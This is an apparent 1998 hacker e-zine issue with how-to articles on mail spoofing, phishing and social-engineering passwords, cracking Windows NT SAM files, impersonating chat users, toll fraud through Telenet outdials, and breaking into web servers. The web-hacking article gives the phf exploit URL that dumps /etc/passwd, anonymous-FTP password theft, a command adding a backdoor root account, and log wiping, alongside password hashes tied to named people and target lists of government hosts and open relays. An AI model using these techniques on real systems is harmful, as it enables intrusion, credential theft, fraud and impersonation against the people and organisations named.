|---------------------------------------------------------------------------| | -=[ United Hacker Association 1 - Magazine, Issue I ]=- | | June 01, 1998 | | E-Mail : uha1@gmx.net | |---------------------------------------------------------------------------| If you want you can add this text to your Homepage/BBS/Ftp/... It's free, but please don't change anything without our permission!! PLEASE USE THIS TEXT ON YOUR OWN RISK! WE ARE NOT RESPONSIBLE FOR ANYTHING! Index : 1. A Guide To Anonymous Mail (by GhostHawk) 2. Ports (by GhostHawk) 3. Government Computer Systems (by GhostHawk) 4. Hacking Windows NT (by the file ripper) 5. How to get a persons IP (by Andreaz) 6. Hacking of TOL-Chat (by the file ripper) 7. Hacking of Yahoo-Chat (by Dave_Crash) 8. Hacking of VOL-Chat (by the hacking Cook) 9. How To Use Outdials (by AcidMeister) 10. Web Page Hacking For Newbies (by AcidMeister) 11. Some Relaying-Server (by the file ripper) 12. AOL-Gateways (by AcidMeister) 13. Trojaning (by the file ripper) 14. Programming Virii (by the file ripper) 15. XXX/Porno (by the file ripper) If you want to publish one of your texts in our Magazine, just mail us your text to : uha1@gmx.net (with subject line = UHA MAGAZINE), we will review it and if it is a good one we will publish it. Note : All texts are welcome. You can write about everything you want, but it has to do something with hacking/cracking/phreaking/carding/virii/computers ... -thanx- -- We can manipulate you however we want. We can read and change your personal datas. We can take your identity. Kill your existence. We can come near to you from everywhere in the world. You cann't escape! -- (by the file ripper [UHA1]) !!IMPORTANT!! If you have any questions, please don't mail us or the authors, just go to http://www.uha1.com and post a message in our BBS!!! !!IMPORTANT!! Note : http://www.uha1.com (after the uha there is a ONE!) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1. A Guide To Anonymous Mail by Ghost Hawk GhostHawk@gmx.net March 04, 1998 This is surprisingly easy. Sure you can download an anonymous e-mailer. But thats no fun. In this file I will teach you how to do anonymous mail by telneting into the server. To anonymous mail someone fist off you have to telnet into a system on port 25. Not all systems have port 25 open. I am going to use the server i use the most as an example. Ok first off i telnet into demonspawn.inna.net 25. telnet demonspawn.inna.net Trying 209.48.124.11... Connected to demonspawn.inna.net. Escape character is '^]'. 220 demonspawn.inna.net ESMTP Sendmail 8.7.5/8.7.3; Wed, 4 Mar 1998 17:36:34 - 0500 Ok, that meens i'm connected! Then you look at the server name. In this case its demonspawn.inna.net. So i type the following. "helo demonspawn.inna.net" The server than returnes: 250 demonspawn.inna.net Hello yourhosthere.com [Your IP], pleased to meet you Than you put who you want to make it from, by typing: "MAIL FROM:BillGates@microsoft.com" You can put any e-mail you want it from! The Server Returns: 250 BillGates@microsoft.com... Sender ok You than put who you want to send it to.(i'm gonna use me as an example): "RCPT TO:Ghosthawk@gmx.net" The Server Returnes: 250 Recipient ok After that you type: "DATA" Then the server says: 354 Enter mail, end with "." on a line by itself Than all you have to do is type your message, than a "." and its sent! Easy! Thats all for this file!!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 2. Ports by Ghost Hawk GhostHawk@gmx.net March 04, 1998 Describtion of Ports... echo 7 discard 9 systat 11 daytime 13 netstat 15 qotd 17 chargen 19 ftp-data 20 ftp 21 telnet 23 smtp 25 time 37 rlp 39 name 42 whois 43 domain 53 nameserver 43 mtp 57 bootp 67 tftp 69 rje 77 finger 79 link 87 supdup 95 hostnames 101 iso-tsap 102 dictonary 103 x400 103 x400-snd 104 csnet-ns 105 pop 109 pop2 109 pop3 110 portmap 111 sunrpc 111 auth 113 sftp 115 path 117 uucp-path 117 nntp 119 ntp 123 nbname 137 nbdatagram 138 nbsession 139 news 144 sgmp 153 tcprepo 158 snmp 161 snmp-trap 162 print-srv 170 vmnet 175 load 315 vmnet0 400 systek 500 biff 512 exec 512 login 513 who 513 shell 514 syslog 514 printer 515 talk 517 ntalk 518 efs 520 route 520 timed 525 tempo 526 courier 530 conference 531 rvd-control 531 netnews 532 netwall 533 uucp 540 klogin 543 kshell 544 new-rwho 550 remotefs 556 remonitor 560 monitor 561 garcon 600 maitrd 601 busboy 602 acctmaster 700 acctslave 701 acct 702 acctlogin 703 acctprinter 704 elcsd 704 acctinfo 705 acctslave2 706 acctdisk 707 kerberos 750 kerbos-master 751 passwd-server 752 userreg-server 753 krb-prop 754 erlogin 888 kpop 1109 phone 1167 ingerslock 1524 maze 1666 nfs 2049 knetd 2053 eklogin 2105 rmt 5555 mtb 5556 man 9535 w 9536 mantst 9537 bnews 10000 rscs0 10000 queue 10001 rscs1 10001 poker 10002 rscs2 10002 gateway 10003 rscs3 10003 remp 10004 rscs4 10004 rscs5 10005 rscs6 10006 rscs7 10007 rscs8 10008 rscs9 10009 escsa 10010 rscsb 10011 qmaster 10012 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3. Government Computer Systems by Ghost Hawk GhostHawk@gmx.net March 04, 1998 I have made this file mainly for the newbie Hacker. But it will also be a good reference for the Elite Hacker. I'm gonna have a list of some really cool computers to Hack. I also will have some really nice ways to get passwords for the comps. Computer Addresses: Government: sundance.ll.nl.gov ednet1.osl.or.gov mecsys.mec.ohio.gov ARD.FBI.GOV *FBI Main Computer* Military: hq.af.mil *American Air Force HEADquarters* pentagon.mil *PENTAGON* redstone.army.mil *Army* wpgate.hqpacaf.af.mil *Area 51* www.acc.af.mil guam.andersen.af.mil archive.afit.af.mil www.hickamo.af.mil cs1.langley.af.mil *CIA* blackbird.afit.af.mil *American Nuclear agency* dgis.dtic.dla.mil *D.O.D* Nasa: xfiles.gsfc.nasa.gov phys.gsfc.nasa.gov genesis.gsfc.nasa.gov boris.gsfc.nasa.gov plds3.gsfc.nasa.gov nssdca.gsfc.nasa.gov fdd.gsfc.nasa.gov arioch.gsfc.nasa.gov university.gsfc.nasa.gov garc.gsfc.nasa.gov pao.gsfc.nasa.gov farside.gsfc.nasa.gov Thats all I have for the computer adresses. Nice Ways to Get Passwords! Here are some ways that ive found over time to get passwords. Annonymous FTP: The most common way is to annonymously FTP into the server. Say you wanna hack http://www.target.com you would ftp into ftp.target.com, then you would get etc/passwd. Get your password cracker out and crack the password. If its shadowed you gotta problem. Shadowed passwords are where theres a * instead of a password. Annonymous E-Mail: I neat little way i stumbled upon is to annonymous E-Mail them. Works everytime, if their stupid. All you do is find out their ISP. Its really easy. If their E-mail is loser@killme.com you would E-Mail them using the E-Mail, root@killme.com, or maybe sysadmin@killme.com. Then you say the following: Mail from : root@killme.com Mail to : loser@killme.com Message : Dear Mr. Loser, There has been a successful Hack attempt on your account. If you would like this problem fixed please change your password to "demo3". Thank You For Using Kill Me Internet. End Message! BOOM!! Instant password. That works on all kinds of of systems, shell accounts, webpages, anything! Social Enginnering: I think this way is kind of funny. There are a lot of different Social Engineering methods. I will only discuss one way. I found this method and thought it was cool. What you do is you call up where the computer is hosted. You get a username that you found from it and pretend to be a girl. Normally the guys running these computers have no life and only see the sun 5 minutes a day, so they will love a girl. Tell them in a real sexual way that you would like to get your password changed to whatever, normaly those guys will do anything for a girl. Kinda lame but you might be able to use it as a last resort. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 4. Hacking Windows NT by the file ripper tfr@gmx.net March 19, 1998 Okay, in this text I will shortly describe you a very easy way how to hack a local Windows NT System. I write this text because I think Micro$oft really sucks! First check the system you want to hack... I mean look at it, and check if you can boot with a Boot-Disk. If you are able to boot from a Bootdisk, then all is no problem. Once you are in the Dos-prompt (like "A:\>"), try to access c: by typing in "C:". If this works, copy the "SAM."-file from the directory "winnt\system\config" (if it's not located there, search for it, with the dos-command : "dir /s sam. /a") If you have no access to c:, then try a program called "NTFSDOS" It gives you access on NTFS partions! It's really good. You are not logged! But you also have only read-access. Ok. After you got the file, get l0phtcrack from www.l0pht.com Start L0phtcrack... File - Import SAM-File ... happy cracking! Oh yeah... if the Bootdisk-trick don't works : Log into the system like normal. If you don't have a username/password, try to get in through the guest account. Just kill the CMOS (bios) (because most of the time, the BIOS password is set, if it is you can enter the BIOS without entering a password you don't need to kill the CMOS!) So you can de-lock the disk-lock! Then restart your computer and re-setup the bios... Don't forget : Bootsequenz should be : "A,C" (means, it first checks the disk-drive for a bootable system) Then work like said in the text above ... A Other way : Log in into the system, and get the "SAM._" file of the "winnt/repair" directory. Before you can crack it, use : "expand sam._ sam." (because it's compressed...) Okay, then run l0phtcrack. If Service Pack 3 is installed this won't work and you have to use the way as I said above. have phun! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 5. How to get a persons IP: >>>>>>--Andreaz--<<<<<< E-mail: andreaz@hehe.com March 21, 1998 1. *****Dummy***** Ask the person for his IP. 2. ****E-mail**** Ask for the victim to send you an e-mail. When you have got the mail look at the properties, there you can find the IP. 3. ****ICQ-way**** If you and the victim has ICQ then you can se his IP. Click on the nick, and the choose info. There does the IP stand. But sometimes has the person choosen not to show his IP, but for this only use the old ICQ-client, then you will see the IP as well, or just download a ICQ-sniffer. 4. ****IRC-way**** If you are on IRC, then type "/dns nick". 5. *****Trace***** The easiest way is though to use an "IP-Tracer" 6. *****Guestbook***** (by the file ripper) Ask him to sign your GuestBook. (It saves the IP!) At www.lpage.com you can get a free guestbook. 7. *****Homepage***** (by the file ripper) Ask him to go to your homepage. There you add a automatically opening link, for advertisment. The advertisment Server also will save the IP... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 6. Hacking of TOL-Chat by the file ripper tfr@gmx.net March 23, 1998 Okay, I don't think anybody of you knows the TOL-Chat, because this chat is only for Tyroleans (Austria). But it's a good example for a "secure" ;) cgi-chat. Like you know cgi ist a Common Gateway Interface. That means, everyone has read-write-delete... access. Everytime you write a message in the chat, you write it in a cgi-file. A CGI-URL looks like this (of TOL) http://www.tirol.com/Cgi-bin/chat_mainframe_rel.cgi?Spitz=Fucker That means you only have to change then name after Spitz. In this case you are chatter "Fucker". If you change "Fucker" to "Hallo", then you are chatter "Hallo" and you can get all the messages which are only for him, and you also can write messages, and everyone will think he wrote it... That's a too simple thing :) I know this is not hacking, but enjoy! have phun! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 7. Hacking of Yahoo-Chat by Dave Crash crash_dave_1997@yahoo.com March 19, 1998 Okay, Dave_Crash found out a nice trick on the Yahoo-Chat, but he had not the time to write a text about it, so I (the file ripper) will write it for him. First, Telnet into r2.chat.yahoo.com 4700 Note : r1-r12 are the chatservers. Now it should ask you for a username and a password. Type in "guest". It will let you in. Now you will see a couple of messages scrolling down and down ... It's like you are yourself in the chatroom, but you cann't write any messages and cann't be "seen" by other chatters. But that's not the thing we wanted... Try typing in : "kick ". You just kicked a chatter :). That's a nice trick. You don't even need to be SuperUser or something like this, just kick them out from the guestaccount *LOL* have phun! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 8. Hacking VOL-Chat by the hacking cook Controlio@hotmail.com May 20, 1998 Okay, I'am sure you don't know the Austria Online chat...it's a chat from a provider in Austria...(go to: www.vol.at and there on chat) But it's a good example for a HTML chat, and how to change your name there! First you download the HTML-code of the chat (the part, where you can enter your messages,... not the part where the messegas can be read)! If you have done this, open the HTML-code in Notepad, so, now scroll to the end of the text and there is a line: so, now you are "HORNY" you only change the name, load the HTML again, and are this chatter if u become a nother hacker load the HTML in your editor and change the name, and load it again.... Dont get confused, if there stands "hacked" this isn't your username! I know, this is not realy hacking, but, I think it's fun...so enjoy If you dont want to register you (you must register you, to become a password and so on) here is the complete HTML:
Spitzname: hacked   Meldungen:   Chatraum:
Meldung  :
Erscheint die Meldung "Transfer interrupted", bitte auf Reload klicken. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 9. How To Use Outdials by AcidMeister warming@vol.com This file is for folks who want to get started using outdials. I tried to explain everything in detail, assuming no prior knowledge. Have phun. I have used a lot of information obtained from other g-files in putting together this file. Introduction: Outdials ~~~~~~~~~~~~~~~~~~~~~~ Outdials are extremely useful things which can be used to call long distance without paying and without using codes. Essentially, an outdial is a modem which is connected to a network. You call up the network, then connect to the outdial over the network, then use the modem to call whatever system (BBS) you want to connect to. Sounds complicated, but it really isn't. You will be using modems which are connected to the Telenet network. There are outdials connected to Telenet in every area code. So, you can call just about anywhere you want. The problem is that generally, these outdials don't take collect connections over Telenet. So, we have to use a way of getting around that. That way is called PAC*IT. PAC*IT is a service which is connected to Telenet. Part I - Connecting to the Network ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Ok, first you need to connect to the network. The way to connect to Telenet in order to use these outdials is through Pac*it, which is some sort of gay PC pursuit deal. Anyway, call Pac*it: 1-800-234-2796 at 2400/1200 7E1. After connecting, log on: 1200 baud: just hit a couple of times 2400 baud: send an @ (shift-2) then a It will now say PAC*IT Plus XXXXXXXXXXX111 The X's don't matter, what matters is the last three digits. You can only connect to U.S. modems if this number is between 100 and 300. If the three numbers on the end aren't between 100 and 300 then hang up and call back. Eventually, you will get one that is OK. Under the numbers it will say: 'TERMINAL =' just hit return here. You will now see the well known '@' prompt. This means you are connected to Telenet. Part II - Connecting to the Outdial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Now, you need to know a bit about the way systems on Telenet are addressed. To connect to a system (i.e. outdial) at the '@' prompt, you type the address of the system you want and hit return. You must use the Telenet International Address Format to connect to outdials if you called in through PAC*IT. It looks like this: |------------------------ Data Network Ident. Code (DNIC) | | |----------------- Area code | | | | |----------- DTE address (the specific system in the /\ | / \ area code) / \ / \ / \ /\----- Port Address IIII AAA NNNNN PP For example the Telenet address of 201 346 becomes 31102010034600 So, connect to the outdial in the area code you want by typing in the complete address of the outdial. I know, you are saying to yourself "Where the hell do I get addresses of outdials?" Well, at the end of this g-file, of course. After you have entered the address, you will get a 'CONNECTED' or else some error message. If you get an error, try again, or try another outdial. Part III - Using the Outdial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After you connect, hit ctrl-E a few times, then hit return. After a few seconds you should get a message like '*Hello, I'm Ready*' You are now connected to a modem! Help is available, just enter a ? or H. The command you are most concerned with is D (dial command). So, enter D and it should ask you for the number. Just type in the phone number you want to dial (no area code). It should then say "Dialing..." If you connect, great, you should know what to do now. If the number is busy, or out-of-order or whatever, the outdial will return to command mode. You can then dial again. You can generally disconnect from the outdial itself by entering an '@' then hitting return in the command mode. You should then get the '@' prompt back. Now you can connect to another outdial in a different area code if you want to. Just follow the procedure in Part II again. Part IV - Outdial Addresses ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Area Area code Baud Address code Baud Address ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NJNEW 300: 311020100001 CAOAK 300: 311041500005 1200: 311020100301 1200: 311041500216 2400: 311020100022 2400: 311041500011 DCWAS 300: 311020200115 CAPAL 300: 311041500106 1200: 311020200116 1200: 311041500224 2400: 311020200117 2400: CTHAR 300: CASFA 300: 311041500215 1200: 311020300120 1200: 311041500217 2400: 2400: 311041500023 WASEA 300: 311020600017 ORPOR 300: 311050300020 1200: 311020600019 1200: 311050300021 2400: 311020600021 2400: NYNYO 300: 311021200315 AZPHO 300: 311060200022 1200: 311021200316 1200: 311060200023 2400: 311021200028 2400: 311060200026 CALAN 300: 311021300412 MNMIN 300: 311061200120 1200: 311021300413 1200: 311061200121 2400: 311021300023 2400: 311061200022 TXDAL 300: 311021400117 MABOS 300: 311061700311 1200: 311021400118 1200: 311061700313 2400: 311021400022 2400: 311061700026 PAPHI 300: 311021500112 TXHOU 300: 311071300113 1200: 311021500005 1200: 311071300114 2400: 311021500022 2400: 311071300024 OHCLE 300: 311021600020 CACOL 300: 311071400023 1200: 311021600021 1200: 311071400004 2400: 311021600120 2400: 311071400024 CODEN 300: 311030300114 CASAN 300: 311071400119 1200: 311030300115 1200: 311071400213 2400: 311030300021 2400: 311071400124 FLMIA 300: 311030500120 CASDI 300: 311071400102 1200: 311030500121 (619) 1200: 311071400210 2400: 311030500122 2400: 311071400121 ILCHI 300: 311031200410 UTSLC 300: 311080100020 1200: 311031200411 1200: 311080100021 2400: 311031200024 2400: 311080100012 MIDET 300: 311031300214 FLTAM 300: 311081300020 1200: 311031300216 1200: 311081300021 2400: 311031300024 2400: 311081300124 MOSLO 300: 311031400005 MOKCI 300: 311081600104 1200: 311031400421 1200: 311081600221 2400: 311031400020 2400: 311081600113 GAATL 300: 311040400113 CAGLE 300 1200: 311040400114 1200: 311081800021 2400: 311040400022 2400 CASJO 300: 311040800111 CASAC 300: 311091600007 1200: 311040800021 1200: 311091600011 2400: 311040800110 2400: 311091600012 WIMIL 300: 311041400020 NCRTP 300: 311091900020 1200: 311041400021 1200: 311091900021 2400: 311041400120 2400: 311091900124 Part V - Finishing Up ~~~~~~~~~~~~~~~~~~~~~ As best I can tell, this is a very safe method if you don't abuse it, over use it, etc. Remember, this is a 1-800 number, so if you call it 200 times in a week or 30 times in a day, you may get a call yourself. So, to keep this method alive for everyone to use, don't do this too much. I hope this file has been helpful to you. There are plenty of people who know a lot more about this stuff than I do. But, I will definitely try to help anyone out if I can. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 10. Web Page Hacking For Newbies by AcidMeister warming@vol.com December 30, 1997 First of all you will need an ftp program such as ws_ftp. I use Voyager FTP downloadable at http://www.windows95.com it's real simple and easy to use, so try it if you haven't dealt with ftp before. Now once you have the program find an address like http://www.shiga-pc.ac.jp you can find addresses like this by going to a search engine such as AltaVista and running a search for url:ac.jp this tells the search engine to give you all the academic addresses in Japan ex. ac=academic jp=Japan , you can try this with any country ex. url:dk . But for now let's just focus on the Japanese servers. When u have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address ex. http://www.shiga-pc.ac.jp note.. You will have to log in anonymously. You should then get a list of folders on the remote system usr, pub,etc, dev, bin. See the etc folder? open it, once opened you should see some files passwd and group, open or view the file passwd (this is where the passwords for the system are stored), you should hopefully get something that looks like this. root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh daemon:*:1:1:Mr Background:/: sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys: bin:PASSWORD HERE:3:4:Mr Binary:/bin: uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp: sso:Nologin:6:7:System Security Officer:/etc/security: news:Nologin:8:8:USENET News System:/usr/spool/netnews: sccs:PASSWORD HERE:9:10:Source Code Control:/: ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh jgordon:w4735loqb8F5I:275:15:James."Tiger" Gordon:/usr/email/users/jgordon:/bin/csh lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh This means you've hit the jackpot, in this case you should get a password cracker download one at (http://www.hackersweb.com go to the hacking toolz section), I would recommend for the beginning hacker to get a password cracker such as killer cracker because it's extremely easy to use. Once you have downloaded killer cracker you will need a dictionary file (get one at http://www.hackersweb.com look in the extra toolz section), dictionary filez are better the bigger they are so I would recommend getting one at around 10 MB or more. Now the passwords from the passwd file off the server you are hacking, you will need to save them to a file and place them in the same directory as Killer Cracker, you will also need to have your dictionary file in the same directory. Now you are ready to go, just run killer cracker and tell it the name of the Pwfile=the password file and the name of the word file=your dictionary file, the valid file will be the file where the output of the password cracker will be put just give it a name such as crack.txt. Once the cracker is done cracking the password files for you goto the valid file and take a look the file should look something like this root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh (remember this is an example). This file says that the username is root and the password is root if the file had been like this. root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh (remember again just an example) the login or username would be root and the password would be dumbass, well that's it just ftp to the site using the login and password. Note if you get root type in the following once you have logged in:- echo "myserver::0:0:Test User:/:/bin/csh">>etc\passwd this will allow you to login to the server with 1:myserver so you get the admin suspicious when they see people login as root. Hide yourself as much as possible, if you already have a shell then go through that first when loggin on, or telnet to the hacked site shell and then re-telnet to the hacked shell using the hacked shell, if you see what I mean, so your who appears as local host. Also get some c scripts which delete your presence, erases you off logs etc Now if you were not as lucky to get exactly the same password file as shown in the example above then maybe you got something like this. root:*:0:1:Operator:/: ftp:*:53:53:anonymous ftp:/pub: t2:*:201:201:Takaoka Tadashi:/pub: This means that the passwd file is shadowed, if this is the case then welcome to the administrators world of trying to stop hackers, this is where you cant really do anything. However there is one thing to do sometimes in very rare cases there may be a folder on the remote system that can be accessed by an anonymous login called shadowed, shadow, or secret if this is the case the password files should be in there, congratulations. If there isn't a folder like this, and the passwd file is shadowed then bad luck, go to the next address on your list. Now that you have tried the first thing as shown above there are a couple of other methods you may also want to try one is FTP hacking shown below Go to a dos prompt after you are connected to the internet . Type. ftp www.victim=the site address server will ask for a username press enter server will ask for a password press enter at the prompt type quote user ftp then type quote cwd ~root then type quote pass ftp If you get in make sure you delete the log file they might look at it and see that you were on. Once you get on the passwd file is in etc/passwd so type cd etc then type get passwd. If you have done the above right and the server is old you will have root access. By the way root is the highest security status you can have. Another good way of getting root or a shell at least is through browser hacking. Again well use Japanese educational servers as our target. To do this you will need a browser such as Netscape or Internet Explorer, you will also need a telnet program, you can either download a telnet program at http://www.windows95.com or use the one that already comes with dos. To access the telnet program that comes with dos go to your dos windows and type in telnet www.site.com the site.com stand for the site you want to telnet to, it could be anything like www.geidai.ac.jp or www.tulips.tsukuba.ac.jp . You will also need a cracker program I would recommend using Killer Cracker and applying as above. Next thing you do is open your browser and run a search for url:ac.jp , like explained above. Again I would recommend making a big list of your targets. Now when you have your targets we address type it in your browser and add this to it http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd or http://www.webpage.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd To all you out there who are slightly advanced, I know this is the phf technique and it is virtually dead, but you'll be surprised where you can use this. This technique of finding the password file was first used in November 1996 on the fbi.gov webpage by a few hackers. It has been patched up by a lot of servers, so this won't work on something like www.nasa.gov or most of the www.*.com sites. But still works on many university servers outside Europe and the U.S. O.K. Once the url is entered you will see a number of things:- Error 404 Cgi-bin/phf is not found on this server (the most common one) Or Warning You do not have permission to view cgi-bin/phf?/ on this server There are a number of other things the server might say, but the thing you want it to say is this:- Query Results /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh daemon:fghfhijyjk:1:1:0000-Admin(0000):/: bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh sys:fdn7:3:3:0000-Admin(0000):/: adm:dehf6:4:4:0000-Admin(0000):/var/adm: wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm: news:detdc:6:6:0000-Admin(0000):/usr/lib/news: lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp: smtp:cmvof:0:0:mail daemon user:/: uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:eoend:37:4:Network Admin:/usr/net/nls: nobody:ccvjcvj:60001:60001:uid no b etc This means you have hit the jackpot!!! If you get something similar to this but all lines have something in common like the following:- Query Results /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd root:x:0:1:0000-Admin(0000):/:/bin/sh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: wnn:x:5:5:0000-Admin(0000):/var/adm: news:x:6:6:0000-Admin(0000):/usr/lib/news: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no b (notice the c) if you don't know what this means it means the password file is shadowed and you cannot work out the passwords for a shadowed password file then you're in bad luck, I would recommend trying the ftp hack prior to this for the best results. If some but not all logins have a * in them then it's ok, it's worth while getting the ones which aren't shadowed, hey a shell is a shell!!! If you want to use your newly acquired shells then telnet to the site and put in the login and the password (remember you have to crack the password file first explained at the top). Anyway that's it for now hope at least some people benefited from this guide. Please send Comments, Questions, and Death threats to. But please no mailbombs i feel so sorry for you when i have to fry your asses... Acidmeister@hotmail.com Or visit him at. http://www.hackersweb.com For the ultimate list of hacking guides and toolz of the trade. Or you can find him on Chat.yahoo.com as AcidMeister the one and only Disclaimer: This is for Educational purposes only it should not be used as a guide to cause havoc or to hack. He He He, good luck!!! And don't get caught. I would hate to see you in a cell with your 300 pound Bruno The Gay Ax murderer. He He He Thanx to Samantha and BliNdfire. Copyright AcidMeister... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 11. Some Relaying-Server by the file ripper tfr@gmx.net March 23, 1998 You know this !? You want to send a fake mail (a anonymous mail), but you don't know a relaying server !? here are some... Note : Don't forget ... telnet in with port 25 !! or use them in your anonymous mail sender... 128.236.1.1 128.236.8.2 128.236.8.3 128.236.8.4 128.248.100.50 130.127.200.5 146.126.86.241 155.229.6.2 192.41.21.66 192.41.3.129 192.41.3.130 192.80.63.129 192.9.25.1 192.9.9.1 194.198.118.11 198.161.98.129 199.170.121.4 199.2.194.14 199.222.42.2 204.124.208.102 204.134.8.1 204.174.16.1 204.201.231.46 204.94.125.125 205.138.99.197 205.214.51.15 206.72.10.199 agora.rdrop.com Aspen.CO.US.StarLink.Org babylon.beyondirc.net blacklodge.c2.org blackmagic.sorcery.net Cinci.OH.US.StarLink.Org Cleveland.OH.US.Starlink-IRC.Org communications.com conexis.es cvo.oneworld.com cyberpass.net davis.DAL.net davis.oz.org deathstar.sorcery.net demonspawn.inna.net <-- GhostHawk's 1st choice dhp.com dreamon.com elux3.cs.umass.edu fruit.com gulf.com harborside.com hidden.net hkstar.com host.net idt.net ime.net interlink-bbs.com irc.anet-chi.com irc.aohell.org irc.badgerden.com irc.beachin.net irc.dal.net irc.havenet.com irc.io-online.com irc.liii.com irc.limited.net irc.localhost.net irc.localnet.com irc.mwweb.com irc.oglobo.com.br irc.tech.uh.edu irc.thor.net irc.tscnet.com irc.xtatix.com irc2.inficad.com jeflin.tju.edu lightning.mgl.ca lords.com LosAngeles.CA.US.ChatNet.Org Losangeles.ca.us.Kidsworld.org lycaeum.org mail.acilink.org mail.sojourn.com <-- the file ripper's 1st choice mail.tds.net mail.utexas.edu mailmasher.com malasada.lava.net mind.com mindijari.DAL.net monsoon.com nccn.net neato.ca.us.another.net netacc.net netvision.net nexus.flash.net northernnet.com nymserver.com ocean.us.austnet.org Philadelphia.PA.US.Ultranet.Org post1.com postoffice.com pt.cyanamid.com relay.net remail.obscura.com remailer.nl.com rigel.cyberpass.net russia.com sandiego.ca.us.undernet.org scorpion.latech.edu scsnet.com seidata.com server.com SF.CA.US.Chatnet.Org sos.net southernco.com space.net sprynet.com StrathRoy.ON.CA.Cobra.Net sunrise.ca.us.another.net telephone.com ucinet.com vader.institute.wnyric.org viphosting.com vivanet.com voyager.DAL.net WalnutCreek.CA.US.ChatNet.Org webfire.tx.us.icenet.org webmaster.us.austnet.org www.acc.af.mil www.iowa.net www.montana.net www.netforward.com xs4all.nl have phun! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 12. AOL-Gateways by AcidMeister warming@vol.com aol://4344:1186.Gateway.3685343.498065448 Guide Rainman: 